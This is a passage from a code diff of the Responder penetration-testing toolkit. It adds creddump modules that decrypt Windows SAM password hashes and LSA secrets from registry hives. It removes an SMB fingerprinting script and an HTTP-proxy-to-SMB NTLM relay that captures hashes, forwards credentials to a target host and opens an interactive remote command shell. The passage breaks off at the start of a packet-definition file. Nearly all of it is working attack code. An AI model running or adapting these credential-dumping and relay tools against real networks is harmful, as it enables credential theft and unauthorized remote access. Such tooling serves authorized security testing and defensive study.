enc_lm_hash = V[hash_offset+4:hash_offset+20] if lm_exists else ""
enc_nt_hash = V[hash_offset+(24 if lm_exists else 8):hash_offset+(24 if lm_exists else 8)+16] if nt_exists else ""
return decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey)
def get_user_name(user_key):
samaddr = user_key.space
V = None
for v in values(user_key):
if v.Name == 'V':
V = samaddr.read(v.Data.value, v.DataLength.value)
if not V: return None
name_offset = unpack("<L", V[0x0c:0x10])[0] + 0xCC
name_length = unpack("<L", V[0x10:0x14])[0]
username = V[name_offset:name_offset+name_length].decode('utf-16-le')
return username
def dump_hashes(Key, samaddr):
bootkey = Key
hbootkey = get_hbootkey(samaddr,bootkey)
Output = ""
for user in get_user_keys(samaddr):
lmhash,nthash = get_user_hashes(user,hbootkey)
if not lmhash: lmhash = empty_lm
if not nthash: nthash = empty_nt
hashes = "%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name,16),
lmhash.encode('hex'), nthash.encode('hex'))
hashesdump = "%s:%d:%s:%s:::\n" % (get_user_name(user), int(user.Name,16),
lmhash.encode('hex'), nthash.encode('hex'))
print hashes
Output += hashesdump
return Output
def dump_file_hashes(Key, samhive_fname):
samaddr = HiveFileAddressSpace(samhive_fname)
Output = dump_hashes(Key, samaddr)
return Output

137
tools/MultiRelay/creddump/framework/win32/lsasecrets.py Normal file
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# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
from framework.win32.rawreg import *
from framework.addrspace import HiveFileAddressSpace
#from framework.win32.hashdump import get_bootkey,str_to_key
from Crypto.Hash import MD5
from Crypto.Cipher import ARC4,DES
def get_lsa_key(secaddr, bootkey):
root = get_root(secaddr)
if not root:
return None
enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"])
if not enc_reg_key:
exit(1)
return None
enc_reg_value = enc_reg_key.ValueList.List[0]
if not enc_reg_value:
return None
obf_lsa_key = secaddr.read(enc_reg_value.Data.value,
enc_reg_value.DataLength.value)
if not obf_lsa_key:
return None
md5 = MD5.new()
md5.update(bootkey)
for i in range(1000):
md5.update(obf_lsa_key[60:76])
rc4key = md5.digest()
rc4 = ARC4.new(rc4key)
lsa_key = rc4.decrypt(obf_lsa_key[12:60])
return lsa_key[0x10:0x20]
def decrypt_secret(secret, key):
"""Python implementation of SystemFunction005.
Decrypts a block of data with DES using given key.
Note that key can be longer than 7 bytes."""
decrypted_data = ''
j = 0 # key index
for i in range(0,len(secret),8):
enc_block = secret[i:i+8]
block_key = key[j:j+7]
des_key = str_to_key(block_key)
des = DES.new(des_key, DES.MODE_ECB)
decrypted_data += des.decrypt(enc_block)
j += 7
if len(key[j:j+7]) < 7:
j = len(key[j:j+7])
(dec_data_len,) = unpack("<L", decrypted_data[:4])
return decrypted_data[8:8+dec_data_len]
def get_secret_by_name(secaddr, name, lsakey):
root = get_root(secaddr)
if not root:
return None
enc_secret_key = open_key(root, ["Policy", "Secrets", name, "CurrVal"])
if not enc_secret_key:
return None
enc_secret_value = enc_secret_key.ValueList.List[0]
if not enc_secret_value:
return None
enc_secret = secaddr.read(enc_secret_value.Data.value,
enc_secret_value.DataLength.value)
if not enc_secret:
return None
return decrypt_secret(enc_secret[0xC:], lsakey)
def get_secrets(Key, secaddr):
root = get_root(secaddr)
if not root:
return None
bootkey = Key
lsakey = get_lsa_key(secaddr, bootkey)
secrets_key = open_key(root, ["Policy", "Secrets"])
if not secrets_key:
print "no secret"
return None
secrets = {}
for key in subkeys(secrets_key):
sec_val_key = open_key(key, ["CurrVal"])
if not sec_val_key:
continue
enc_secret_value = sec_val_key.ValueList.List[0]
if not enc_secret_value:
continue
enc_secret = secaddr.read(enc_secret_value.Data.value,
enc_secret_value.DataLength.value)
if not enc_secret:
continue
secret = decrypt_secret(enc_secret[0xC:], lsakey)
secrets[key.Name] = secret
return secrets
def get_file_secrets(Key, secfile):
secaddr = HiveFileAddressSpace(secfile)
return get_secrets(Key, secaddr)

73
tools/MultiRelay/creddump/framework/win32/rawreg.py Normal file
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# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
from framework.newobj import Obj,Pointer
from struct import unpack
ROOT_INDEX = 0x20
LH_SIG = unpack("<H","lh")[0]
LF_SIG = unpack("<H","lf")[0]
RI_SIG = unpack("<H","ri")[0]
def get_root(address_space):
return Obj("_CM_KEY_NODE", ROOT_INDEX, address_space)
def open_key(root, key):
if key == []:
return root
keyname = key.pop(0)
for s in subkeys(root):
if s.Name.upper() == keyname.upper():
return open_key(s, key)
print "ERR: Couldn't find subkey %s of %s" % (keyname, root.Name)
return None
def subkeys(key,stable=True):
if stable: k = 0
else: k = 1
sk = (key.SubKeyLists[k]/["pointer", ["_CM_KEY_INDEX"]]).value
sub_list = []
if (sk.Signature.value == LH_SIG or
sk.Signature.value == LF_SIG):
sub_list = sk.List
elif sk.Signature.value == RI_SIG:
lfs = []
for i in range(sk.Count.value):
off,tp = sk.get_offset(['List', i])
lfs.append(Pointer("pointer", sk.address+off, sk.space,
["_CM_KEY_INDEX"]))
for lf in lfs:
sub_list += lf.List
for s in sub_list:
if s.is_valid() and s.Signature.value == 27502:
yield s.value
def values(key):
for v in key.ValueList.List:
yield v.value
def walk(root):
for k in subkeys(root):
yield k
for j in walk(k):
yield j

54
tools/MultiRelay/creddump/lsadump.py Normal file
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#!/usr/bin/env python
# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
import sys
from framework.win32.lsasecrets import get_file_secrets
# Hex dump code from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump(src, length=8):
N=0; result=''
while src:
s,src = src[:length],src[length:]
hexa = ' '.join(["%02X"%ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N+=length
return result
if len(sys.argv) < 3:
print "usage: %s Bootkey <security hive>" % sys.argv[0]
sys.exit(1)
secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2])
if not secrets:
print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
sys.exit(1)
for k in secrets:
print k
print dump(secrets[k], length=16)

31
tools/MultiRelay/creddump/pwdump.py Executable file
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#!/usr/bin/env python
# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
import sys
from framework.win32.hashdump import dump_file_hashes
if len(sys.argv) < 3:
print "usage: %s bootkey SAM_File" % sys.argv[0]
sys.exit(1)
dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])

0
tools/MultiRelay/relay-dumps/.gitignore vendored Normal file
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225
tools/RelayHTTPSMB/Finger.py
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@@ -1,225 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,socket,struct
from socket import *
from odict import OrderedDict
__version__ = "0.3"
Timeout = 0.5
class Packet():
fields = OrderedDict([
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
return length
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMBSessionFingerData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\x00\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1",""),
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
##Now Lanman
class SMBHeaderLanMan(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x08"),
("flag2", "\x01\xc8"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x3c\x1b"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNegoDataLanMan(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x54\x00"),
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
def calculate(self):
CalculateBCC = str(self.fields["BuffType"])+str(self.fields["Dialect"])
self.fields["Bcc"] = struct.pack("<h",len(CalculateBCC))
#####################
def atod(a):
return struct.unpack("!L",inet_aton(a))[0]
def dtoa(d):
return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
print "Host down or port close, skipping"
pass
try:
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
n = SMBNegoDataLanMan()
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
return GetHostnameAndDomainName(data)
except:
pass
def SmbFinger(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
print "Host down or port close, skipping"
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
t = SMBSessionFingerData()
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
pass
##################
#run it
def ShowResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
raise
return False
try:
print "Retrieving information for %s..."%Host[0]
OsVer, LanManClient = SmbFinger(Host)
print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
Hostname, DomainJoined = DomainGrab(Host)
print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
except:
pass
def RunFinger(Host):
m = re.search("/", str(Host))
if m :
net,_,mask = Host.partition('/')
mask = int(mask)
net = atod(net)
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
ShowResults((host,445))
else:
ShowResults((Host,445))

386
tools/RelayHTTPSMB/HTTPToSMBRelay.py
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@@ -1,386 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, re, os, logging, warnings, thread, optparse, time
from HTTPRelayPacket import *
from Finger import RunFinger
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
from socket import *
__version__ = "0.4"
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="python %prog -t10.20.30.40 -u Administrator lgandx admin", version=__version__, prog=sys.argv[0])
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
options, args = parser.parse_args()
if options.TARGET is None:
print "\n-t Mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print "\n-u Mandatory option is missing, please provide a username to relay.\n"
parser.print_help()
exit(-1)
UserToRelay = options.UserToRelay
Host = options.TARGET, 445
Cmd = ""
def ShowWelcome():
print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CRTL-C.\033[1;31m\n'
print 'Use this script in combination with Responder.py for best results.'
print 'Do not to use Responder.py with -P set. This tool does the same'
print 'than -P but with cross-protocol NTLM relay. Always target a box '
print 'joined to the target domain,not the PDC as SMB signing is enabled '
print 'by default. For optimal pwnage and stealthiness, launch Responder '
print 'with these 2 options only: -rv \033[0m'
print '\n\033[1;34mRelaying credentials only for these users:\033[32m'
print UserToRelay
print '\033[0m\n'
ShowWelcome()
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../"
Logs = logging
Logs.basicConfig(filemode="a",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
try:
RunFinger(Host[0])
except:
print "The host %s seems to be down or port 445 down."%(Host[0])
sys.exit(1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
#Function used to verify if a previous auth attempt was made.
def ReadData(Outfile, Client, User, Domain, Target, cmd):
try:
with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
if re.search(Login.encode('hex'), filestr.read().encode('hex')):
print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
return True
else:
return False
except:
raise
def ParseHTTPHash(data, key, client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
print "[+] Received NTLMv1 hash from: %s"%(client)
if User in UserToRelay or "ALL" in UserToRelay:
print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
return None, None
else:
return User, HostName
else:
print "[+] Username: %s not in target list, dropping connection."%(User)
return None, None
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
print "[+] Received NTLMv2 hash from: %s"%(client)
if User in UserToRelay or "ALL" in UserToRelay:
print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
return None, None
else:
return User, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(User)
return None, None
def longueur(payload):
return struct.pack(">i", len(''.join(payload)))
def ExtractChallenge(data):
SecBlobLen = struct.unpack("<h", data[43:45])[0]
if SecBlobLen < 255:
Challenge = data[102:110]
if SecBlobLen > 255:
Challenge = data[106:114]
print "[+] Setting up HTTP Proxy with SMB challenge:", Challenge.encode("hex")
return Challenge
def ExtractRawNTLMPacket(data):
SecBlobLen = struct.unpack("<h", data[43:45])[0]
SSP = re.search("NTLMSSP", data[47:]).start()
RawNTLM = data[47+SSP:47+SecBlobLen]
return RawNTLM
def GetSessionResponseFlags(data):
if data[41:43] == "\x01\x00":
print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.."
def get_command():
global Cmd
Cmd = ""
while len(Cmd) is 0:
Cmd = raw_input("C:\\Windows\\system32\\:#")
def SMBKeepAlive(s, data, NextEcho = 20):
while True:
head = SMBHeader(cmd="\x2b",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBEcho()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
time.sleep(NextEcho)
def HTTPProxyRelay():
so = socket(AF_INET,SOCK_STREAM)
so.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
try:
so.bind(('0.0.0.0', 3128))
so.listen(10)
s = socket(AF_INET, SOCK_STREAM)
s.connect(Host)
s.settimeout(30)
except:
"Cannot bind to port 3128, something else must be using it."
sys.exit(1)
try:
while True:
conn, addr = so.accept()
data = conn.recv(4096)
if not data:
break
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Relay PROXY NTLM NEGO to target srv.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048)
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractChallenge(data)#Grab challenge key
conn.send(str(Buffer_Ans))
data = conn.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
Username, Domain = ParseHTTPHash(NTLM_Auth, key, addr[0])
if Username is not None:
##Got the ntlm message 3, send it over to SMB.
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
s.send(buffer1)
smbdata = s.recv(2048)
return smbdata, s, addr[0], Username, Domain
else:
return None
else:
Response = WPAD_Auth_407_Ans()
conn.send(str(Response))
data = conn.recv(4096)
except:
return None
def RunPsExec(Host):
GetCredentials = HTTPProxyRelay()
if GetCredentials == None:
return False
data, s, clientIP, Username, Domain = GetCredentials
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
## First, check if user has admin privs on C$:
## Tree Connect
if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#Verify if the target returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## Fail Handling.
if data[8:10] == "\x75\x22":
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
return False
## Fail Handling.
if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned."
return False
## Tree Connect
if data[8:10] == "\x75\x00":
print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## Go to NtCreateAndx
if data[8:10] == "\x75\x00":
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
while True:
if data[8:10] == "\x75\x00":
#thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
thread.start_new_thread(get_command, ())
while Cmd == "":
pass
if Cmd == "exit":
sys.exit(1)
data = RunCmd(data, s, clientIP, Username, Domain, Cmd, Logs, Host)
if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection. Make sure to clean the server (\\Windows\\Temp\\)\033[0m\n"
if data[8:10] == "\x2d\x34":#Confirmed with OpenAndX that no file remains.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
Cmd2 = raw_input("C:\\Windows\\system32\\:#")
while len(Cmd2) is 0:
Cmd2 = raw_input("C:\\Windows\\system32\\:#")
if Cmd2 == "exit":
sys.exit(1)
data = RunCmd(data, s, clientIP, Username, Domain, Cmd2, Logs, Host)
if data[8:10] == "\x2d\x00":
print "[*] File still exist (Windows\\Temp\\Results.txt), server's not playing nicely."
def main():
try:
num_thrd = 1
while num_thrd > 0:
RunPsExec(Host)
time.sleep(1)
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
try:
main()
except:
raise

343
tools/RelayPackets.py
View File

@@ -1,343 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import sys
sys.path.append('../')
from odict import OrderedDict
from packets import Packet
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("errorcode", "\x00\x00\x00\x00"),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
